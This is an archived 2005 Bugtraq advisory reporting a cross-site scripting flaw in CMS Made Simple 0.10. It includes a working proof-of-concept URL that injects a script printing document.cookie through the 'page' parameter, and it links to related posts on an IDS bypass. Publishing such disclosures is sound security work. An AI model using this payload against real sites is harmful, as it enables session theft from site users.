CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

X1ngBox_at_securityfocus.com
Date: 09/26/05

  • Next message: c0ntexb_at_gmail.com: "RealPlayer && HelixPlayer Remote Format String Exploit" 
    Date: 26 Sep 2005 08:38:05 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is) [Description]: CMS lets you update your pages and keep the content on a static page that will
                    not become stale regardless of how much other content gets placed on your site

    [version]:CMS Made Simple 0.10

    [vendor]:http://www.cmsmadesimple.org

    [Vulnerability]: cross site script

    [exploit]:
    http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
     
    .......[X1NG]..........
    X1ngBox <at/> Gmail Com

  • Next message: c0ntexb_at_gmail.com: "RealPlayer && HelixPlayer Remote Format String Exploit"

    Relevant Pages

    • [NEWS] %u Encoding IDS Bypass Vulnerability (UTF)
      ... %u Encoding IDS Bypass Vulnerability (UTF) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability has been found in the way many Intrusion ...
      (Securiteam)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (NT-Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-Microsoft)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-IDS)